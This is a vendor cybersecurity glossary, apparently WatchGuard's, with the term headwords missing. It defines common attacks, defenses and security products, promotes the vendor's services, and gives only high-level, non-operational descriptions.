Cybersecurity 101

A foundational security process that regulates who is allowed to access certain apps, data, and resources, and under what conditions.

Adware (advertising-supported software) is automated, unwanted software that monitors online user behavior and displays targeted advertisements, banners, and pop-ups. Sometimes used as spyware to collect user data for cybercriminals.

Unlike generative AI (GenAI) that requires prompts to get results, agentic AI is an autonomous system that uses tools (including GenAI) to perform tasks automatically - that is, with very little or no human intervention. Agentic AI can independently set goals, plan multi-step processes, make decisions, and take actions to achieve objectives.

A phishing attack via social networks such as LinkedIn, Facebook, Instagram, X (Twitter), and Snapchat.

Software that protects computers and networks from malicious software (malware) like viruses, ransomware, spyware, and worms.

A WatchGuard security service that controls access to applications by granting, denying, or limiting permissions based on a user’s department, role, and the time of day, enhancing security and operational efficiency.

A WatchGuard security service that detects and stops sophisticated attacks, including ransomware, zero-day threats, and other advanced malware, using cloud-based sandboxing with full-system emulation analysis to identify APT malware in files and email attachments that enter your network.

Ability of computer systems to perform tasks that usually require human intelligence, like learning, reasoning, problem-solving, perception, and decision-making, enabling machines to understand language, recognize patterns, and act autonomously to achieve goals.

The process of verifying the identity of a user, device, or system, using factors like passwords, biometrics, or security tokens before granting access. Authentication usually requires something a person has (such as a key, badge, or token), something a person knows (such as a password, ID number, or mother's maiden name), or something a person is (face recognition, fingerprint, or retina scan, etc).

A hidden method, whether planned or an accidental design flaw, that allows stealthy entry into a network. Hackers can exploit vulnerabilities or install malicious software to create a backdoor, providing an entry point that bypasses security measures.

Collection of computers that are infected with small bits of code (bots) that allow a remote computer to control some or all of the functions of the infected machines. Typically used for disreputable purposes, such as denial of service attacks, click fraud, and spam.

A common practice whereby employees can use their personally owned devices, like smartphones, laptops, and tablets for work purposes rather than company-issued devices. Increases exposure to malware, data leakage, and credential theft.

These attacks involve spoofed or compromised email accounts used to manipulate normal business workflows and redirect funds. What makes BEC especially dangerous is that it often does not require malware. It relies on trust, timing, and persuasion.

Stands for Cloud Access Security Broker. A security solution that emphasizes strict access control and continuous verification by enforcing access policies for cloud resources and applications. An important component of a zero trust architecture.

A type of attack in which the victim clicks on links on a website they believe to be a known, trusted website. However, they are actually clicking on a malicious, hidden website overlaid onto the known website.

An attack that uses stolen username and password combinations from previous data breaches to attempt logins into other services. Since many people reuse passwords, attackers run automated tools that test millions of credential pairs against target websites.

An attack performed through web browsers, taking advantage of poorly-written web apps. For example, an attacker can trick a user into clicking on a specially crafted, malicious hyperlink that appears to lead to an innocent site, but the site is actually the attacker's and includes embedded scripts.

Stands for Common Vulnerabilities and Exposures. A list of standardized names for all publicly known vulnerabilities and exposures, essential for vulnerability management, as it allows companies to prioritize threats and ensure they are not using outdated, insecure software.

A cyberattack is a deliberate attempt by an individual or group to compromise another party’s information system. Attackers typically aim to disrupt operations or gain unauthorized access to data for personal or organizational gain.

A type of insurance that limits a policy holder’s liability and manages recovery costs in the event of a cyberattack, data breach, or act of cyberterrorism. Insurance providers increasingly demand core zero trust principles, including multi-factor authentication (MFA) and Endpoint Detection and Response (EDR). A zero trust strategy makes it much easier to obtain policies and lowers premiums.

A hidden part of the Internet requiring special browsers like Tor to access. Designed for user anonymity through onion routing, used for both legitimate purposes (privacy, anti-censorship) and illicit activities (black markets, illegal services).

Tools that can scan stealer logs, criminal forums, and third-party breaches on the dark web for your organization's exposed passwords. By providing visibility into exposed corporate credentials, it enables faster response and risk mitigation.

A process of continually scanning the dark web to identify compromised, stolen, or leaked data. This can include intellectual property, credentials, and personal information.

The concept that you can discern whether data is in the condition its authors or owners intend it to be, and that it has not been modified by unauthorized persons during storage or transmittal.

A highly realistic, AI-generated image, video, or audio, created to convincingly impersonate someone or some event. In cybersecurity, deepfakes are used to trick users into taking an action, like redirecting funds or sharing confidential information.

A type of attack that attempts to make an online service unavailable by flooding the target with more requests than it can handle, usually from a single source.

A type of attack that attempts to make an online service unavailable by flooding the target with more requests than it can handle. Unlike a DoS attack that typically comes from a single source, in a DDoS attack attackers use multiple compromised devices to generate traffic from many sources simultaneously.

A technique that tricks a DNS server into believing it has received authentic information when, in reality, the information is false. Used to take unsuspecting victim to a malicious website.

An attack technique where a hacker intercepts a system's requests to a DNS server in order to issue false responses as though they came from the real DNS server.

A WatchGuard security service that blocks malicious DNS requests, redirects users to a secure, informative page, and promotes best security practices to prevent phishing attacks and reduce malware infections.

The gathering and publication of personal information like addresses and phone numbers by hostile parties to try to intimidate or harass someone.

Traffic that moves between two or more machines across the same data center, including server-to-server communication or between individual devices.

Any attempt to gain greater permissions illicitly (typically, by impersonating a privileged user or otherwise bypassing normal authentication) within a computer system is considered an elevation of privilege.

Many endpoint security systems have multiple agents (lightweight services that run in the background to automate monitoring and control). A more secure, modern approach is to have a single agent that drives your entire security ecosystem, leading to decreased CPU load, bandwidth use, and operational complexity.

A security solution that continuously monitors endpoint devices for threats such as ransomware, fileless attacks, zero-day malware, and phishing. Using AI and machine learning, EDR collects endpoint data, analyzes behavior, and enables automated or manual responses to stop threats before they spread.

A cloud-native security solution that centralizes next-generation antivirus with self-learning, AI-powered analytics for Windows, macOS, and Linux desktops, laptops, and servers. Goes beyond signature-based antivirus, using behavioral analytics to stop malware, ransomware, and zero-day threats that traditional solutions miss.

A security solution that combines Endpoint Protection Platform (EPP) technologies, advanced Endpoint Detection and Response (EDR), and self-learning AI-powered agents and services to protect computers, laptops, and servers from threats invisible to traditional solutions.

A wireless access point masquerading as a trusted wireless network, used to trick users into connecting to attacker's network, where they can steal passwords or other sensitive information by either intercepting unencrypted HTTP traffic or using their control of network traffic to run convincing phishing attacks.

An alert that incorrectly flags legitimate activity or files as malicious threats. Can be caused by overly sensitive monitoring tools or misconfigured rules.

A type of cyberattack that uses legitimate, built-in system tools (like PowerShell, WMI) and resides in computer memory (RAM) instead of writing malicious files to the hard drive. Extremely difficult for traditional antivirus software to detect. Often called living-off-the-land (LotL) attacks.

WatchGuard's flagship NGFW firewall. Known for delivering the indispensable balance of performance, low total cost of ownership (TCO), and simplicity that empowers businesses to grow with confidence. Available in both tabletop and rackmount appliances, virtual FireboxV solutions, and Firebox Cloud.

A network security device that inspects incoming and outgoing traffic, blocking or allowing traffic based on configurable security rules. Firewalls have long been considered a network's first line of defense against unwanted, dangerous traffic.

A cloud-based firewall solution that provides network security capabilities through a subscription model, so there is no need to pay for and maintain physical, on-premises equipment. This allows companies to simplify their network architecture while scaling security.

A signature-based WatchGuard security service that detects and blocks known spyware, viruses, trojans, worms, rogueware, and complex threats.

A type of artificial intelligence (AI) that can generate high-quality text, images, and other content based on massive amounts of data it has been trained on. Relies on human or non-human prompts to begin the creation process. ChatGPT is an example of a popular GenAI tool.

A unified architectural framework that integrates disparate identity and access management tools to act as a single unified system, giving organizations a centralized approach for managing digital identities in complex IT environments.

Attacks that focus on stealing or guessing valid user credentials to bypass security perimeters. Once attackers obtain legitimate credentials, they appear as authorized users and can move through systems without triggering many security alerts.

Stands for Identity Provider. Acts as a central authority to verify users and grant secure access to applications, often through single sign-on (SSO) and multi-factor authentication (MFA). By creating, maintaining, and managing digital identities, it protects against unauthorized access by centralizing identity management and enforcing strong authentication.

A proactive, real-time behavioral indicator, like suspicious admin activity, abnormal user behavior, or privilege escalation, that reveals an attack is in progress.

A digital clue that helps security teams detect, investigate, and respond to malicious activity that has already taken place on a network or endpoint. Clues include a suspicious IP address, file hash, or unusual inbound and outbound network traffic.

A cybercriminal who specializes in gaining unauthorized access to computer networks and systems, then selling that access to other criminals. IABs are part of the Ransomware-as-a-Service economy.

A WatchGuard security service that automates malware discovery and classifies current and future threats in mere seconds with AI-powered intelligence.

An AI tool trained on massive data sets of language to understand and generate human-like text. Capable of processing written instruction via human or non-human prompts, then responding in conversational language to create fresh content and answer complex questions.

Fundamental security policy that only allows users, applications, or systems to have the absolute minimum permissions needed to perform their specific tasks, and nothing more. Prevents lateral movement and minimizes access to sensitive data by enforcing strict access controls and role-based permissions.

A fileless malware cyberattack technique in which hackers use legitimate, native operating system tools and features like scripts, admin tools, or scheduled tasks, to conduct malicious activities. They avoid detection by blending in with normal system operations.

Legitimate processes and services that Windows uses to perform
certain tasks can be hijacked by attackers to use for malicious
purposes. They are effective because these are trusted process
names and binaries that look non-malicious.

Technologies based on algorithms that can learn from data, enabling systems to identify patterns, make decisions, and improve themselves through experience and data.

Online advertisements that contain embedded malware or tricks the user into downloading malware upon reaching the resulting website. Malvertising is usually performed via clickjacking.

A broad term for any software designed to damage, disrupt, or gain unauthorized access to computers, networks, or data. Includes ransomware, viruses, spyware, and much more. Because malware is constantly evolving and increasingly dangerous, modern cybersecurity requires multi-layered defensive tools that include Zero Trust Network Access, Managed Detection and Response, and Endpoint Detection and Response.

Type of cyberattack where attackers secretly insert themselves into the communication channel established between two legitimate parties to read, intercept, or even manipulate the data traffic.

A fully managed cybersecurity service that continuously monitors your IT environment, including endpoints, networks, cloud applications, and user accounts, to detect and stop threats before they cause harm. Unlike traditional tools, which only alert users to possible issues, MDR combines advanced AI-driven analytics and human expertise to investigate and respond to attacks in real time.

A third-party company that remotely manages a customer’s IT infrastructure and end user systems, typically based on a subscription model with service level agreement (SLA). Sometimes referred to as Managed Security Service Provider (MSSP) when provided services are specifically focused on cybersecurity needs.

A not-for-profit organization that operates federally funded research and development centers to support US government agencies in cybersecurity, defense, aviation, and healthcare. MITRE ATT&CK® Evaluations are widely trusted for their transparency and rigor, offering a detailed look at how endpoint security solutions behave during real-world attack scenarios.

A framework that categorizes cybercriminal tactics, techniques, and procedures (TTPs) across the attack lifecycle. It is used by security teams to model, detect, and prevent attacks. MITRE only publishes raw data, making it beneficial to explore vendor and third-party explanations, rankings, and guidance.

An authentication method that requires the user to provide two or more verification factors, such as a password, token, and fingerprint, to gain access to a resource such as an application, online account, or VPN.

Provides continuous, real-time monitoring and analysis of network traffic to detect, investigate, and stop malicious threats. Can be deployed as an appliance or through the cloud. Advantage of cloud-native NDR: no new hardware to manage, no sensors, no packet capture infrastructure, eliminating cost and complexity of hardware-based NDR.

A WatchGuard security service that generates a visual map of all nodes on your network, ensuring only authorized devices are connected while detecting all open ports and protocols.

Uses AI, machine learning, and behavioral analysis that is not available in traditional antivirus solutions to proactively detect and stop known and unknown threats. Goes beyond traditional signature-based methods to catch modern malware, ransomware, and fileless attacks before they cause damage.

A network security device that provides capabilities beyond a traditional, stateful firewall, including additional features like application awareness and control, integrated intrusion prevention, and cloud-delivered threat intelligence.

Traffic that moves between an organization's network perimter and the outside world (e.g., the Internet, a user's device). See East/West Traffic

Stands for OpenID Connect protocol. An identity authentication protocol used to enable two unrelated applications to share user profile information without compromising user credentials.

A passwordless authentication standard that allows users to sign in to apps and websites using biometrics (fingerprint, face scan) or a device PIN instead of a password. Gives MSPs a way to offer phishing-proof authentication. Passkeys work like unlocking your phone, the same fingerprint or face, but now also for logging into apps. No password to forget. No code to intercept. And fake websites simply can't trick it.

The process of applying vendor-issued updates to close security vulnerabilities and optimize the performance of software and devices. The best patch management services detect missing patches, outdated or EOL software, and known CVEs, then correlate that data with risk severity to help teams prioritize remediations.

A social engineering attack in which the attacker tries to trick the victim into giving up sensitive information by masquerading as a trusted entity.

Programs that are specifically not malware, but they do abnormal actions or are corrupted. The vast majority of PUPs are AutoKMS tools, hacking tools, and adware.

Stands for Professional Services Automation. The core business and operations platform for an MSP delivering managed services. It brings together the service desk and ticketing, time and expense tracking, project management, contracts and SLAs, billing and invoicing, procurement, and reporting in one system, ensuring work is captured, managed, and billed consistently end-to-end.

Malware originally used to extort money from victims by encrypting or otherwise blocking access to applications or files until a sum of money is paid. Today, attackers’ more often steal information and threaten to make it public. For protection, Zero Trust Network Access (ZTNA) ensures that even if credentials are compromised, attackers cannot automatically access accounts, sensitive information, or critical services.

A cybercrime business model in which ransomware developers sell ransomware code or malware so that even inexperienced hackers can launch attacks using sophisticated tools.

A type of malware that grants an attacker covert, administrative-level control over an infected device from a remote location. Acts as backdoors that allow threat actors to maintain persistence on a victim's computer and potentially load other malware or run malicious commands.

The technology IT and MSPs use to centrally monitor, secure, and maintain networks, servers, and devices (endpoints). Modern RMM solutions support both on-premises and cloud infrastructure monitoring and remote smart device management to improve efficiency and cost.

A WatchGuard security service providing cloud-based web reputation service that aggregates data from multiple feeds to provide real-time protection from malicious sites and botnets.

An unauthorized wireless access point installed on a secure network. Rogue access points increase the attack surface of a network and can potentially allow an attacker to obtain network access without being physically present in the building.

A security model that limits access to a computer network or system based on the user's role within an organization.

SAML (Security Assertion Markup Language) is an open-standard, XML-based protocol used for exchanging authentication and authorization data between parties, primarily to enable single sign-on (SSO).

Stands for Software-Defined Wide Area Network. A virtualized approach to managing wide area networks. It connects users, offices, and remote sites to applications across multiple transport types. It centralizes control, allowing for dynamic traffic steering, automated routing, and improved agility for cloud-based applications.

A cloud-based framework that converges networking (like SD-WAN) and security functions (like Secure Web Gateway, CASB, Firewall as a Service, Zero Trust Network Access) into a single, unified service to securely connect users, devices, and applications anywhere.

A cybersecurity solution that filters Internet traffic between users and the web. When a user tries to visit a website, their request is first sent to the SWG, which checks the request against defined policies based on corporate and regulatory requirements. SWGs are insufficient as stand-alone solutions and need to be part of a larger, layered, zero trust defense strategy.

A security team that acts as an organization's central command, bringing together its entire IT infrastructure. High costs, complexity, and staff-intensive requirements make deploying an internal SOS unrealistic for all but the largest enterprises. Managed service providers (MSPs) are key to providing critical SOC services for smaller and mid-market businesses.

A cloud-based model that converges key security services like (ZTNA, SWG, CASB) to secure access to web, cloud, and private applications, crucial for hybrid work and cloud environments. Protects users, devices, and data regardless of location, and is considered a security component of the broader SASE framework. 

When users install and use devices and unapproved SaaS apps, increasing data exposure.

Stands for Security Information and Event Management. Provides real-time analysis of security alerts from applications and network hardware. The main downsides of SIEM products are their complexity and high cost, leading to difficult setup, alert fatigue, significant resource needs (expertise, hardware), and long deployment times. XDR is the smarter choice for MSPs and lean IT teams.

Ability to identify threats by comparing system activity to a database of known attack patterns (signatures) to detect malicious behavior. The weakness of signature-based detection is that modern threats mostly rely on techniques that are not recognized by signatures alone.

An authentication method in which one login (typically with username and password) allows access to multiple applications and services, providing convenience for users and better and centralized oversight for IT teams.

Stands for Security Orchestration, Automation, and Response. A technology that unifies security tools, automates repetitive tasks, and orchestrates incident response workflows to help security teams manage threats more efficiently, reducing manual effort and improving response times.

An attack that psychologically manipulates people into clicking malicious links, opening infected attachments, or revealing passwords. Particularly effective because it targets the human element, bypassing firewalls and other security mechanisms.

A cloud-based model where software applications are delivered over the Internet, typically via a web browser, on a subscription basis, with the provider managing all underlying infrastructure, maintenance, and updates.

WatchGuard security service that provides real-time, continuous, and highly reliable protection from spam and phishing attempts.

A type of targeted phishing attack where the attacker uses gathered details about the targeted victim to increase the credibility of the attack message.

The act of disguising a communication so that it appears to come from a trusted, legitimate source. Attackers manipulate identifying information to deceive recipients and security systems.

Malicious software that secretly enters your device, gathers your personal information (like passwords, browsing habits, financial details) without your consent, and sends it to third parties.

The process of inputting SQL queries into a data field and tricking the backend database into divulging data not intended to be outputted.

A general-purpose protocol for encrypting web, email, and other stream-oriented information sent over the Internet. Prevents eavesdropping and tampering during communication, such as in HTTPS websites, email, and VoIP.

An application that appears legitimate but performs malicious actions unbeknown to the user.

A type of phishing attack that uses VoIP or phone calls in an attempt to elicit information from unsuspecting victims.

Stands for Virtual Private Network. Provides security benefits of a private, dedicated, leased-line network without the cost of owning one. Uses cryptography to make data unreadable over the Internet. Commonly used to connect multiple company locations. Weakness of VPN is that it allows access with just a username and password. If a password is leaked, your systems are open. Zero Trust Network Access (ZTNA)is a modern alternative to VPNs.

WatchGuard security service that automatically blocks known malicious sites and uses detailed content and URL filtering tools to prevent inappropriate content, save bandwidth, reduce legal liability, and boost productivity.

A type of spear-phishing attack specifically targeted at high-ranking executives in an organization.

Stands for Extended Detection and Response. While EDR focuses on identifying and responding to threats at the endpoint level, XDR broadens the scope by collecting telemetry data and automatically correlating detections across multiple security domains, including endpoint, identity, email, network, and cloud. Using AI and machine-learning technologies, XDR then performs automatic analysis to integrate them into a centralized security system.

A cybersecurity strategy based on the principle of "never trust, always verify," assuming threats exist everywhere. Rather than relying on a single technology, it implements multiple security controls, including multi-factor authentication, EDR, Zero Trust Network Access, and dark web credential monitoring. In addition, users only have access to the specific parts of the network they need and not more.

A security model that requires strict identity verification for every person and device, inside or outside the network perimeter, trying to access resources on a private network.

A security framework that assumes threats are everywhere and therefore verifies every user and device attempting to access resources, and grants least-privileged access to specific applications rather than to the entire network. A foundational security model within SASE.

A type of threat that exploits an unknown software vulnerability before the user/developer knows about it or has a patch ready, giving defenders no time to fix it. Also known as a 0-day.